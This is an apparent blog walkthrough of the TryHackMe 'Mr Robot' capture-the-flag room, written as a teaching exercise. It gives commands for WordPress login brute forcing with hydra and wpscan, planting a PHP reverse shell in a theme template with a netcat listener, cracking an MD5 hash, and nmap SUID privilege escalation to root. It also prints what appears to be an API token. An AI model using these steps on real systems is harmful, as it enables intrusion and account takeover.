Mr Robot CTF (The Easy Way)

aayush malla
7 min readSep 29, 2020

--

Today we will be doing Mr Robot CTF room of the tryhackme. Mr Robot is the CTF for beginner and intermediate level.

At first we have to download the openvpn file and connect to the tryhackme using openvpn. Process of connecting is shown in the Mr Robot CTF room.

Now first lets scan the given ip address using nmap/zenmap. If you are a beginner I recommend you to use zenmap as it is the graphical tool for nmap.

Here i will be using zenmap as it will be easy to demonstrate it .From the zenmap scan we can see that the port 80 and 443 are opened.

fig 1: zenmap result

As port 80 is for http and 443 is for https lets copy the ip address in browser to open the website.

Here a website will open.Website is based on the Theme of Mr Robot series.

fig 2: Mr Robot CTF website

Now let’s search for a directory of the website using gobuster.

Syntax for using gobuster in website ip address

gobuster dir -u http://IP -w /path_to_wordlist_/

Here, -u flag is for specifying url

and -w flag for specifying wordlist

Example:

gobuster dir -u http://10.10.245.39 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt 2>/dev/null

Here for directory searching we will be using wordlist : directory-list-2.3-medium.txt

Here 2 > /dev/null is done to redirect any error to /dev/null .(It’s not compulsory)

fig 3: results of gobuster

Now let’s try to go to each directory to search for keys or any hint.

From trying a bunch of urls I found out that /wp-login and /robots are two directory that are useful for us.

/wp-login is the login page for wordpress

fig 4:wp-login page

/robots contain information about the first key and a dictionary .

fig 5: robots page

Here now let’s go to ip/key-1-of-3.txt .

For example: 10.10.72.66/key-1-of-3.txt .

Here once we go to the above mentioned url we will get the first key.

fig 6: key-1-of-3.txt

Similarly let’s go to IP/fsocity.dic url to download the fsocity.dic file.

fig 7: fsocity.dic

Now let’s check the no of words inside the dsocity.dic file using the command.

wc fsocity.dic

fig 8: original word count of fsocity.dic

Here we can see that there are a total of 858160 words in fsocity.dic file .Here there is hgh chance that the words inside the files are duplicate so lets eliminate the duplicate words.

For this we have to use following command

sort fsocity.dic | uniq > sorted_fscociety.dic

Here above command sorts the fsocity.dic file and then stores unique words inside the sorted_fscociety.dic file.

Now let’s check the word count of the sorted_fscociety.dic file

fig 9: sorted fsocity.dic

Here we can see that there are now 11451 words which is very less than 858160.

Now our task is to find the username and password of wp-login . For this we have to use the above provided dictionary (sorted_fscociety.dic).

Now for the username as this room is based on the series Mr Robot whose main character name is elliot so when i tried to enter elliot as username and some random password then it says incorrect password for the username which means that the username is correct and password is wrong.

Here Above mentioned process is process of random guessing where on the basis of the series i have guessed the username. However it is not a real case scenario .For users who don’t have watched Mr Robot it might be difficult to guess the username so for this another way is to brute force username using the above word list and with the help of hydra.

For this at first let’s intercept the request of /wp-login using burp suite to check the parameter names and host.

fig 10: capturing request using burpsuite

Now let’s use hydra to perform brute force on the username :

hydra -L sorted_fscociety.dic -p test 10.10.44.38 http-post-form “/wp-login/:log=^USER^&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1:F=Invalid username”

-L is to login with several login in a file

-p is for password

^USER^ and ^PASS^ is for hydra field were hydra will bruteforce

&pwd=^PASS^&wp-submit=Log+In&redirect_to=http%3A%2F%2F10.10.245.39%2Fwp-admin%2F&testcookie=1 are parameters

:F=Invalid username is error message

10.10.200.191 Host

http-post-form for specifying post method

/wp-login/ is directory

Here we will get elliot as a username

Now, lets brute force password of elliot

To perform password bruteforce lets use wpscan tool .

Here latest wpscan version need api token so for this at first we have to create an account on

https://wpvulndb.com

And then use the generated API key.

Command to perform bruteforce in password is:

wpscan — url http://IP/wp-login -U elliot -P /location_to_wordlist/ — api-token your_api_key

wpscan — url http://10.10.44.38/wp-login -U elliot -P ~/Downloads/sorted_fscociety.dic — api-token BTmbaz7S8hst4pZi7LEjndkb2c1R9Q6rOg

— url: specifies the full URL that you want to scan (don’t forget the ‘http’)

-U: the username to use

-P: the password file to use

fig 11: output of wpscan

Now let’s login to /wp-login/ using the username : elliot and password:ER28–0652

After logging now try to gain access to the web server using reverse_shell . For this we have to edit files with php extension so that we can add reverse_shell code in php.

We will be editing 404.php file and for this go to Appearance-> editor-> and choose 404 Template

Now let’s replace the original content of the 404.php with the reverse shell code that you can obtain from

Here in revershell code you have to place your ip address

$ip = ‘127.0.0.1’; // CHANGE THIS

You can also change port number if you want but it’s not compulsory.

$port = 1234; // CHANGE THIS

Here now to get a reverse shell let’s start listening using netcat

nc -lnvp 1234

Here 1234 is port number

Now let’s go to ip/404/php to get the reverse shell.

fig 12 : getting unstable shell

Here we obtain a reverse shell which is unstable thus to get a stable shell we use the following command

python -c ‘import pty; pty.spawn(“/bin/bash”)’

fig 13 : getting stable shell

Here we get the stable shell.

Now let’s go to the /home/robot directory where we can see that there are two files .

We don’t have access to read key-2-of-3.txt as currently we are daemon and we need to be robot to read the file.However we have password.raw-md5 file which is md5 encrypted now lets encrypt the content of the file in our local machine using hashcat

Command used

hashcat -m 0 hash.txt /usr/share/wordlist/rockyou.txt

Here we have copied the content of password.raw-md5 into hash.txt

fig 14 : cracked password.raw-md5

Here from the result we get to know that the decrypted password is abcdefghijklmnopqrstuvwxyz

Now let’s change the user to robot

su robot

Password: abcdefghijklmnopqrstuvwxyz

fig 15 : getting robot access

Now let’s read the content of key-2-of-3.txt using command : cat key-2-of-3.txt

fig 16 : second key

Here we successfully get the second key.

The last flag for most CTFs is almost always in the /root directory but only the root user has access to that directory. A very common way of escalating privileges on a Linux system is to look for binaries that have the SUID bit set and abusing them.

Now for third key we need to get directory /root and we need to be root

Now to search for potential privilege escalation we can use linpeas,linenum or simply use the below command .

find / -perm +6000 2>/dev/null | grep ‘/bin/’

fig 17 : checking application with SETUID set

Here we can see nmap binaries are set to SUID bit and by searching i get to know that old version of nmap can be used to run shell command by using it in interactive mode

Command used:

nmap -interactive

!sh

Here we get root access now let's read the content of key-3-of-3.txt file inside root.

fig 18: getting root access

BINGO!! we get the third key.

Here from this lab we get to know about various techniques like information gathering( using nmap,gobuster), Getting reverse shell ,bruteforcing(using hydra, wpscan),Privelege escalation(exploiting nmap).

References:

--

--

aayush malla
aayush malla

Written by aayush malla

Data Engineer, Cybersecurity enthusiast , PLSQL, Data Analyst

No responses yet